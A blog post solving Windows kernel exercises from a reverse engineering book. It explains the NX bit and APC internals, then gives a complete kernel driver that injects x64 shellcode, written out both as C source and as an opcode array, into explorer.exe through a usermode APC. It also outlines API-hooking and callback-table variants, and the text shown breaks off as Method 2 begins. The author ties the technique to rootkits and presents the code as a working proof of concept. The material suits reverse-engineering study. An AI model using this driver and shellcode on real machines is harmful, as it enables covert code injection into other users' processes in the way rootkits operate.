Monday, February 9, 2015

Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering (part 2)

Here is the second part of my solutions to the "Windows Kernel" exercises from the "Practical Reverse Engineering" book. Specifically, this post covers the first eight exercises that you will find in the "Investigating and Extending your Knowledge" section.
Note that the code proposed in my solutions is meant as working proofs of concept, and that the methodologies can be generalized and improved so that they work independently of the Windows version. Finally, the ideas I used to solve the exercises are based on known mechanisms (e.g. the KeUserModeCallback method).

NX is a bit set in the page tables that specifies whether a memory page can run executable code or not. If the CPU tries to execute code from a page that is not marked as executable, an exception is raised. Windows (and other OSes too) leverages this bit in order to mark heap and stack data areas as not executable. In this way, should a buffer overflow happen, an attacker will not be able to exploit it in order to jump to a shellcode on the heap or stack. This bit is supported on x64 architecture, and on x86 with PAE enabled.
Prior to the introduction of this bit, there were some software implementations that tried to provide non-executable data by using hardware segmentation (e.g. W^X and ExecShield). The x86 hardware, in fact, provides segmentation in order to define code and data segments, each with its own properties (read, write or execute). Normally, Windows (32bit) creates usermode code and data segments (CS and DS) that are as big as the whole 32bit addressable range: this means that according to the code segment properties, every possible 32bit address is executable (the division between usermode and kernelmode is done via the page tables). This leaves the opportunity for an exploit to write shellcodes in data areas and execute them. To sort out this problem without the NX bit, it is possible to make a code segment smaller, in order to leave out a range of addresses that are not part of it. Then a data segment can be created using this range of memory that is not part of the code segment. At this point, the code segment can be marked as executable, and the data segment can be marked as read/write only, ensuring that if the execution ends up in the range of addresses reserved for the data, an exception is raised.
Another potential way to emulate the NX bit would be to modify the page tables for the heap and stack in order to make them invalid: every access to a page would trigger a page fault, that would be trapped by the page fault handler. The OS would have to check the kind of fault, and determine if it is a memory read, write or execute. If it is execute, then there is something wrong and the process will be terminated. In theory, this would work, but in practice it would add a very big overhead on the run time (every memory access would cause an exception!), thus it may not be feasible (the PaX Linux kernel patch uses a similar approach).
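As a rough illustration of the hardware NX bit described above, the following sketch tests bit 63 of a 64-bit page table entry, which is where the NX (XD) flag lives in the PAE and long-mode entry formats. The helper names and the sample values are made up for this example; real code would read the entries from the page tables, and the flag is only honoured when the CPU has NX support enabled.

```c
#include <assert.h>
#include <stdint.h>

#define PTE_PRESENT (1ULL << 0)   /* P: the page is mapped */
#define PTE_WRITE   (1ULL << 1)   /* R/W: the page is writable */
#define PTE_NX      (1ULL << 63)  /* NX/XD: instruction fetches from the page fault */

/* Hypothetical helper: returns 1 if an instruction fetch from the page is allowed. */
static int pte_is_executable(uint64_t pte)
{
    return (pte & PTE_PRESENT) != 0 && (pte & PTE_NX) == 0;
}

/* Hypothetical helper: marks a data page (heap or stack) as non-executable. */
static uint64_t pte_make_data(uint64_t pte)
{
    return pte | PTE_NX;
}
```

With these helpers, an entry such as `0x1000 | PTE_PRESENT` is reported as executable, while the same entry passed through `pte_make_data` is not.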

The APIs that provide the functionality to manage APCs are KeInitializeApc and KeInsertQueueApc. Since they are not declared in the DDK headers it is necessary to assign their addresses to appropriate function pointers via MmGetSystemRoutineAddress in order to use them.
  • KeInitializeApc simply initializes a KAPC structure by storing into it all the necessary information about the APC that is going to be queued for execution, including the KTHREAD to which the APC must be queued to and the addresses of the callbacks to run.
  • KeInsertQueueApc, instead, does the actual work of scheduling the APC for execution in the given KAPC.Thread (of type KTHREAD). To do so, it begins by acquiring the spinlock stored in KTHREAD.ApcQueueLock, necessary for proper synchronization. Then, if KTHREAD.ApcQueueable is set to 1, the API invokes the internal function KiInsertQueueApc, which in turn verifies that KAPC.Inserted is set to 0 and, if it is, adds the APC to some memory referenced by the KTHREAD.ApcStatePointer array. In particular, this array contains two pointers to KAPC_STATE structures, where the APC queues (implemented by using LIST_ENTRYs) are actually stored.
    Why two? The first KAPC_STATE structure is related to the APCs whose KAPC.ApcStateIndex is OriginalApcEnvironment, while the second is related to the ones whose KAPC.ApcStateIndex is AttachedApcEnvironment. Basically, the value of KAPC.ApcStateIndex differentiates between the APCs that run in the context of the process to which the thread belongs and the ones that run while the thread is attached to a different process. This is why two structures are kept.
    Once the correct one is determined, a further discrimination is to be made. Each structure contains an array of two LIST_ENTRY structures (named KAPC_STATE.ApcListHead), one of which is selected according to the value stored in KAPC.ApcMode, which is either 0 (KernelMode) or 1 (UserMode). These are the actual APC queues.
    Once the APC is queued, the member KAPC.Inserted is set to 1, and then, if the APC is kernelmode, KTHREAD.KAPC_STATE.KernelApcPending is also set to 1. Furthermore, HalRequestSoftwareInterrupt may be invoked to switch to APC_LEVEL.
  • The queues of APCs will eventually be walked by the KiDeliverApc API, which will call the various kernel, normal and rundown routines for each APC.
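The queue selection described in the list above can be modelled in plain usermode C. This is only a simplified sketch: the `model_*` types and functions are invented for the illustration, the two KAPC_STATE structures are embedded in the thread instead of being reached through KTHREAD.ApcStatePointer, and the spinlock and the software interrupt request are left out.

```c
#include <assert.h>
#include <stddef.h>

enum { ENV_ORIGINAL = 0, ENV_ATTACHED = 1 };  /* stands for KAPC.ApcStateIndex */
enum { MODE_KERNEL = 0, MODE_USER = 1 };      /* stands for KAPC.ApcMode */

typedef struct list_entry {
    struct list_entry *flink, *blink;
} list_entry;

typedef struct {
    list_entry apc_list_head[2];  /* one queue per mode */
    int kernel_apc_pending;
} model_apc_state;

typedef struct {
    model_apc_state states[2];    /* one state per environment */
    int apc_queueable;
} model_thread;

typedef struct {
    list_entry entry;
    model_thread *thread;
    int env, mode, inserted;
} model_apc;

static void model_thread_init(model_thread *t)
{
    for (int e = 0; e < 2; e++) {
        for (int m = 0; m < 2; m++) {
            list_entry *h = &t->states[e].apc_list_head[m];
            h->flink = h->blink = h;          /* empty circular list */
        }
        t->states[e].kernel_apc_pending = 0;
    }
    t->apc_queueable = 1;
}

/* Returns 1 if the APC was queued, 0 if it was rejected. */
static int model_insert_queue_apc(model_apc *apc)
{
    model_thread *t = apc->thread;
    if (!t->apc_queueable || apc->inserted)
        return 0;
    model_apc_state *st = &t->states[apc->env];        /* pick the environment */
    list_entry *head = &st->apc_list_head[apc->mode];  /* pick the mode queue */
    apc->entry.flink = head;                           /* insert at the tail */
    apc->entry.blink = head->blink;
    head->blink->flink = &apc->entry;
    head->blink = &apc->entry;
    apc->inserted = 1;
    if (apc->mode == MODE_KERNEL)
        st->kernel_apc_pending = 1;
    return 1;
}
```

Queueing the same `model_apc` twice fails the second time because `inserted` is already set, which mirrors the KAPC.Inserted check mentioned above.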
APCs offer the possibility to execute code inside a specific process' context and there are various possible use cases for them. Windows uses APCs to perform thread suspension, to schedule some completion routines, to set and get a thread's context, and more.
Usermode APCs provide a handy way to execute code in usermode from kernelmode, commonly done by rootkits since it allows the possibility to inject malicious payloads in running processes, hook their APIs etc. Examples are presented in the answer to exercise 3.

Since there is no directly available API to create a process from kernel mode, I decided to leverage APCs to run malicious usermode code in a particular process. I devised three different ways to achieve this goal and, although all of them rely on APCs, their approach changes considerably.
The general strategy involves some preliminary operations to locate the target process, obtain its handle and allocate some memory in its process address space. The malicious code is then copied in this memory area (injection) and an APC is initialized in either one of these ways:
  1. Usermode APC with the normal routine set to the allocated area, that contains the malicious code.
  2. Kernelmode APC with the kernel routine set to hook a user-mode API. In this case, the allocated area contains the assembly code of the hook, that will be executed only once, in the context of the target process.
  3. Kernelmode APC with the kernel routine set to overwrite an empty entry in the kernel-to-usermode callback table with the address of the allocated area, and let KeUserModeCallback call it. The allocated area contains the malicious code.
There are of course many other methods to start a process from kernelmode code. For example, a possible variant of the second method, that doesn't involve APCs, would consist in using PsSetCreateProcessNotifyRoutine in order to inject the malicious code in every process that is created and then hooking a common API to redirect its code towards the malicious code. However, here I chose to focus solely on the three ideas mentioned above.

Method 1
For the first method, I used the APCs in the most natural way: I queued a usermode APC to Explorer that simply runs a "shellcode", which in turn locates and calls the CreateProcess API to execute Notepad.

First of all, I needed to have the usermode shellcode, thus I wrote the following usermode application:
 #include <stdio.h>
 #include <intrin.h>
 #include <windows.h>
 typedef BOOL (*PCREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,
  LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
 void main(void)
 {
      unsigned __int64 ptrPEB;
      unsigned __int64 ptrPEB_LDR_DATA;
      unsigned __int64 ptrInLoadOrderModuleList;
      unsigned __int64 DllBase;
      unsigned int *pNames, *pAddresses;
      PCREATEPROCESS pCreateProcess;
      wchar_t *DllPath;
      char app_notepad[12];
      STARTUPINFO si;
      PROCESS_INFORMATION pi;
      IMAGE_DOS_HEADER *pMZ;
      IMAGE_NT_HEADERS *pPE;
      IMAGE_EXPORT_DIRECTORY *pExpDir;
      // build the string on the stack, one character at a time, so that it is not placed in a data section
      app_notepad[0] = 'n';
      app_notepad[1] = 'o';
      app_notepad[2] = 't';
      app_notepad[3] = 'e';
      app_notepad[4] = 'p';
      app_notepad[5] = 'a';
      app_notepad[6] = 'd';
      app_notepad[7] = '.';
      app_notepad[8] = 'e';
      app_notepad[9] = 'x';
      app_notepad[10] = 'e';
      app_notepad[11] = 0;
      //memset(&si, 0, sizeof(si));
      for(int j = 0; j < sizeof(si); j++)
           ((char *)&si)[j] = 0;
      si.cb = sizeof(si);
      //memset(&pi, 0, sizeof(pi));
      for(int j = 0; j < sizeof(pi); j++)
           ((char *)&pi)[j] = 0;
      CHAR *currentName;
      // PEB -> PEB_LDR_DATA -> InLoadOrderModuleList -> FullDllName.Buffer
      ptrPEB = __readgsqword(0x60);
      ptrPEB_LDR_DATA = *(unsigned __int64 *)(ptrPEB + 0x18);
      ptrInLoadOrderModuleList = *((unsigned __int64 *)(ptrPEB_LDR_DATA + 0x10));
      DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);
      DllPath += 0x14;     // skip "C:\windows\system32\"
      // walk the module list until kernel32.dll is found
      while(1)
      {
           // 6b 00 65 00 72 00 6e 00 - 65 00 6c 00 33 00 32 00 - 2e 00 64 00 6c 00 6c 00
           if( ((unsigned __int64 *)DllPath)[0] == 0x006e00720065006b &&
                ((unsigned __int64 *)DllPath)[1] == 0x00320033006c0065 &&
                ((unsigned __int64 *)DllPath)[2] == 0x006c006c0064002e )
                break;
           ptrInLoadOrderModuleList = *((unsigned __int64 *)ptrInLoadOrderModuleList);
           DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);
           DllPath += 0x14;     // skip "C:\windows\system32\"
      }
      // parse the PE headers of kernel32.dll to reach its export directory
      DllBase = *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x30);
      pMZ = (IMAGE_DOS_HEADER*)DllBase;
      pPE = (IMAGE_NT_HEADERS*)(DllBase + pMZ->e_lfanew);
      pExpDir = (IMAGE_EXPORT_DIRECTORY*)(DllBase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
      pNames = (unsigned int *)(DllBase + pExpDir->AddressOfNames);
      pAddresses = (unsigned int *)(DllBase + pExpDir->AddressOfFunctions);
      for(unsigned int i = 0; i < pExpDir->NumberOfNames; i++)
      {
           currentName = (CHAR*)(DllBase + pNames[i]);
           //43 72 - 65 61 - 74 65 - 50 72 - 6f 63 - 65 73 - 73 41
           if( ((unsigned __int64 *) currentName)[0] == 0x7250657461657243 &&
                ((unsigned __int32 *) currentName)[2] == 0x7365636f &&
                ((unsigned short *) currentName)[6] == 0x4173 )
           {
                pCreateProcess = (PCREATEPROCESS)(DllBase + pAddresses[i]);
                break;
           }
      }
      pCreateProcess(NULL, (LPTSTR)app_notepad, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
 }

This code purposely avoids the use of any API or CRT function in order to be relocatable. As a result, after compiling it, I was able to simply copy all the opcodes generated for the "main" function and use them as an executable buffer that gets injected into a running process.
The shellcode behaves similarly to the ones you can find in the exploits: it accesses the PEB to get the PEB_LDR_DATA and its InLoadOrderModuleList field, which is a pointer to a list of LDR_DATA_TABLE_ENTRY structures, each representing a loaded module. The code walks the list to locate kernel32.dll (the DLL name is kept in LDR_DATA_TABLE_ENTRY.FullDllName) and, once found, it retrieves its imagebase via LDR_DATA_TABLE_ENTRY.DllBase. It is then straightforward to parse the PE header of the dll in order to locate its export table, and the address of the CreateProcessA API from it. The shellcode concludes by calling such API to launch Notepad.
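The 64-bit constants used by the shellcode to recognize "kernel32.dll" and "CreateProcessA" are simply the characters of those strings as a little-endian CPU sees them through a wider pointer. The small sketch below (the function names are mine, not part of the shellcode) rebuilds the constants from the characters, which is a convenient way to derive them for a different module or API name.

```c
#include <assert.h>
#include <stdint.h>

/* Packs four UTF-16 code units as they appear when the string is read through
   a 64-bit pointer on a little-endian CPU: the first character ends up in the
   low 16 bits. */
static uint64_t pack_wide4(const uint16_t *s)
{
    uint64_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint64_t)s[i] << (16 * i);
    return v;
}

/* Same idea for eight ASCII bytes, as used for the exported function name. */
static uint64_t pack_ascii8(const char *s)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return v;
}
```

For instance, packing the wide characters 'k', 'e', 'r', 'n' gives 0x006e00720065006b, and packing the bytes of "CreatePr" gives 0x7250657461657243, the first constants compared in the two loops of the shellcode.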

Having the shellcode sorted out, let's see the code for the kernelmode driver (note that the shellcode is encoded in the "buffer[]" array):
 #include <Ntifs.h>  
 #include <string.h>  
 char buffer[] = {  
 0x48, 0x81, 0xEC, 0x68, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0x6E, 0xC6,  
 0x84, 0x24, 0x39, 0x01, 0x00, 0x00, 0x6F, 0xC6, 0x84, 0x24, 0x3A, 0x01, 0x00, 0x00, 0x74, 0xC6,  
 0x84, 0x24, 0x3B, 0x01, 0x00, 0x00, 0x65, 0xC6, 0x84, 0x24, 0x3C, 0x01, 0x00, 0x00, 0x70, 0xC6,  
 0x84, 0x24, 0x3D, 0x01, 0x00, 0x00, 0x61, 0xC6, 0x84, 0x24, 0x3E, 0x01, 0x00, 0x00, 0x64, 0xC6,  
 0x84, 0x24, 0x3F, 0x01, 0x00, 0x00, 0x2E, 0xC6, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x41, 0x01, 0x00, 0x00, 0x78, 0xC6, 0x84, 0x24, 0x42, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x43, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x50, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x68,  
 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x04, 0xC0, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0xD0, 0xC7, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC7,  
 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x54,  
 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24,  
 0x54, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x18, 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x54, 0x01,  
 0x00, 0x00, 0xC6, 0x84, 0x04, 0x80, 0x00, 0x00, 0x00, 0x00, 0xEB, 0xD0, 0x65, 0x48, 0x8B, 0x04,  
 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x84, 0x24, 0x48, 0x01, 0x00,  
 0x00, 0x48, 0x8B, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x84,  
 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40,  
 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48,  
 0x89, 0x44, 0x24, 0x50, 0x33, 0xC0, 0x83, 0xF8, 0x01, 0x74, 0x74, 0x48, 0x8B, 0x44, 0x24, 0x50,  
 0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x48, 0x39, 0x08, 0x75, 0x2C, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x48, 0x39,  
 0x48, 0x08, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x2E, 0x00, 0x64, 0x00, 0x6C,  
 0x00, 0x6C, 0x00, 0x48, 0x39, 0x48, 0x10, 0x75, 0x02, 0xEB, 0x34, 0x48, 0x8B, 0x84, 0x24, 0x98,  
 0x00, 0x00, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48, 0x89, 0x44, 0x24, 0x50, 0xEB, 0x85, 0x48,  
 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x89, 0x44, 0x24, 0x68,  
 0x48, 0x8B, 0x44, 0x24, 0x68, 0x48, 0x89, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03,  
 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x78, 0x48, 0x8B, 0x44, 0x24, 0x78, 0x8B, 0x80,  
 0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,  
 0x89, 0x44, 0x24, 0x70, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x20, 0x48, 0x8B, 0x4C, 0x24,  
 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48,  
 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x1C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48,  
 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x60, 0xC7, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x58, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x18, 0x39, 0x84, 0x24, 0x58,  
 0x01, 0x00, 0x00, 0x0F, 0x83, 0x86, 0x00, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68,  
 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,  
 0x48, 0x39, 0x08, 0x75, 0x45, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x81, 0x78, 0x08,  
 0x6F, 0x63, 0x65, 0x73, 0x75, 0x34, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x0F, 0xB7,  
 0x40, 0x0C, 0x3D, 0x73, 0x41, 0x00, 0x00, 0x75, 0x21, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x4C, 0x24, 0x60, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8,  
 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x58, 0xEB, 0x05, 0xE9, 0x55, 0xFF, 0xFF, 0xFF, 0x48,  
 0x8D, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x84, 0x24,  
 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00, 0x00,  
 0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,  
 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x45, 0x33,  
 0xC0, 0x48, 0x8D, 0x94, 0x24, 0x38, 0x01, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x54, 0x24, 0x58, 0x33,  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xC3
 };
 typedef enum _KAPC_ENVIRONMENT
 {
      OriginalApcEnvironment,
      AttachedApcEnvironment,
      CurrentApcEnvironment,
      InsertApcEnvironment
 } KAPC_ENVIRONMENT;
 VOID KernelRoutine(struct _KAPC *Apc,
      PKNORMAL_ROUTINE *NormalRoutine,
      PVOID *NormalContext,
      PVOID *SystemArgument1,
      PVOID *SystemArgument2 )
 {
      DbgPrint("APC kernel routine\n");
      ExFreePool(Apc);     // release the KAPC allocated in DriverEntry
 }
 VOID MyUnload(PDRIVER_OBJECT DriverObject)
 {
      DbgPrint("Unload routine\n");
 }
 NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
 {
      PEPROCESS p_proc;
      LIST_ENTRY *lentry;
      LIST_ENTRY *le;
      char * pImgFNam;
      HANDLE pid;
      BOOLEAN check = FALSE;
      HANDLE ProcHandle = 0;
      SIZE_T region_size = 4096;
      ULONG zero_bits = 0;
      UNICODE_STRING apiName;
      UCHAR *baseaddr = 0;
      ULONG bw;
      NTSTATUS status_code;
      CLIENT_ID client_id;
      OBJECT_ATTRIBUTES ObjAttr;
      PETHREAD ethreads;
      KAPC_STATE apc_state;
      // both routines are exported by the kernel but not declared in the headers
      VOID (*PKeInitializeApc) (PKAPC Apc, PETHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine,
           PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ApcMode, PVOID NormalContext);
      BOOLEAN (*PKeInsertQueueApc) (PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, UCHAR mode);
      struct _KAPC *pApc;
      DriverObject->DriverUnload = &MyUnload;
      // walk the list of processes looking for explorer.exe (hardcoded offsets, see the notes below)
      p_proc = PsGetCurrentProcess();
      lentry = (LIST_ENTRY *) ( ((unsigned char*)p_proc) + 0x188 ); // ActiveProcessLinks : _LIST_ENTRY
      for(le = lentry; le->Flink != lentry; le = le->Flink)
      {
           p_proc = (PEPROCESS) ( ((unsigned char*)le) - 0x188 );
           pImgFNam = (char *)( ((unsigned char*) p_proc) + 0x2e0 );
           if(strncmp(pImgFNam, "explorer.exe", sizeof("explorer.exe")) == 0)
           {
                check = TRUE;
                break;
           }
      }
      if(!check)
           return STATUS_UNSUCCESSFUL;
      pid = PsGetProcessId(p_proc);
      // take the first thread of the target process
      le = (LIST_ENTRY*) ( ((unsigned char *)p_proc) + 0x30); // ThreadListHead
      ethreads = (PETHREAD) ( ((unsigned char*)(le->Flink)) - 0x2f8);
      client_id.UniqueProcess = pid;
      client_id.UniqueThread = PsGetThreadId(ethreads);
      ObjAttr.Length = sizeof (OBJECT_ATTRIBUTES);
      ObjAttr.RootDirectory = NULL;
      ObjAttr.Attributes = OBJ_KERNEL_HANDLE;
      ObjAttr.ObjectName = NULL;
      ObjAttr.SecurityDescriptor = NULL;
      ObjAttr.SecurityQualityOfService = NULL;
      status_code = ZwOpenProcess(&ProcHandle, GENERIC_ALL, &ObjAttr, &client_id);
      if(status_code != STATUS_SUCCESS)
           return STATUS_UNSUCCESSFUL;
      // ZeroBits is passed by value, not by address
      status_code = ZwAllocateVirtualMemory(ProcHandle, (PVOID *)&baseaddr, (ULONG_PTR)zero_bits, &region_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      if(status_code != STATUS_SUCCESS)
           return STATUS_UNSUCCESSFUL;
      // the usermode address is only valid in the context of the target process
      KeStackAttachProcess(p_proc, &apc_state);
      memcpy(baseaddr, buffer, sizeof(buffer));
      KeUnstackDetachProcess(&apc_state);
      RtlInitUnicodeString(&apiName, L"KeInitializeApc");
      PKeInitializeApc = MmGetSystemRoutineAddress(&apiName);
      RtlInitUnicodeString(&apiName, L"KeInsertQueueApc");
      PKeInsertQueueApc = MmGetSystemRoutineAddress(&apiName);
      pApc = ExAllocatePool(NonPagedPool, sizeof(struct _KAPC));
      if(pApc == NULL)
           return STATUS_UNSUCCESSFUL;
      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)baseaddr, UserMode, NULL);
      if(!PKeInsertQueueApc(pApc, 0, 0, 0))
           return STATUS_UNSUCCESSFUL;
      return STATUS_SUCCESS;
 }

The driver begins by walking the ActiveProcessLinks from the EPROCESS structure in order to locate the EPROCESS corresponding to Explorer.exe (the target process). The code then retrieves the ThreadListHead from this EPROCESS, and takes note of the first ETHREAD of the list (it is not really important which one). Having done that, PsGetProcessId and PsGetThreadId are called to retrieve the CID of the target process/thread. The driver proceeds by allocating an executable area of memory inside the process via ZwOpenProcess/ZwAllocateVirtualMemory, where it then copies the shellcode bytes. To perform the copy, the driver needs to switch to the Explorer process context via KeStackAttachProcess/KeUnstackDetachProcess.
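The pointer arithmetic the driver uses to go from a list entry back to the structure that contains it (subtracting 0x188 from the ActiveProcessLinks pointer) is the usual "containing record" idiom. Here is a usermode sketch of the same walk on a made-up structure; `model_process` and its field layout are assumptions for the example and have nothing to do with the real EPROCESS layout. Unlike the kernel list, this model has no separate list head that lives outside of a process structure.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef struct list_entry {
    struct list_entry *flink, *blink;
} list_entry;

/* Stand-in for EPROCESS: the list links are embedded in the structure. */
typedef struct {
    int pid;
    list_entry links;
    char image_name[16];
} model_process;

/* Goes from a pointer to the embedded links back to the enclosing structure. */
#define RECORD_FROM_LINKS(p) \
    ((model_process *)((unsigned char *)(p) - offsetof(model_process, links)))

/* Walks the circular list once and returns the first process with that name. */
static model_process *find_process(list_entry *start, const char *name)
{
    list_entry *le = start;
    do {
        model_process *proc = RECORD_FROM_LINKS(le);
        if (strncmp(proc->image_name, name, sizeof(proc->image_name)) == 0)
            return proc;
        le = le->flink;
    } while (le != start);
    return NULL;
}
```

Using `offsetof` instead of a literal offset is what a version-independent driver cannot do for undocumented structures, which is why the proof of concept hardcodes values such as 0x188 and 0x2e0.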
Finally, an APC is initialized by calling KeInitializeApc and passing to it the pointer to the allocated shellcode as the normal routine. This APC is then queued to the target thread belonging to Explorer via KeInsertQueueApc. To be precise, a kernel routine is also required by the OS during the initialization, but since we don't really need it, I specified a dummy one that simply frees the memory reserved for the KAPC structure.
At this point, whenever the target thread is scheduled for execution, the APC is going to be run and the usermode shellcode will start a new process. It goes without saying that it is important to choose a thread that actually enters an alertable state: some processes may have threads that are asleep or stuck in a non-alertable wait, and if an APC is queued to them, it may never have a chance to be executed. In my case I picked the first thread of the Explorer process for convenience: I noticed that this thread awakens when you right click on the icon of a folder on the desktop, which is very handy because it allowed me to trigger the APC manually whenever I wanted.

Method 2
As an alternative, I decided to hijack the execution flow of a process towards my shellcode harnessing kernelmode APCs. The idea is to patch an API that gets called quite often: the patch installs a jump to the shellcode in the entry point of the API, which, in turn, executes Notepad and calls the original API.

The code of the DriverEntry is almost the same as the one from Method 1; the only difference is that this time the scheduled APC is kernelmode and not usermode. The two lines that differ are the following:
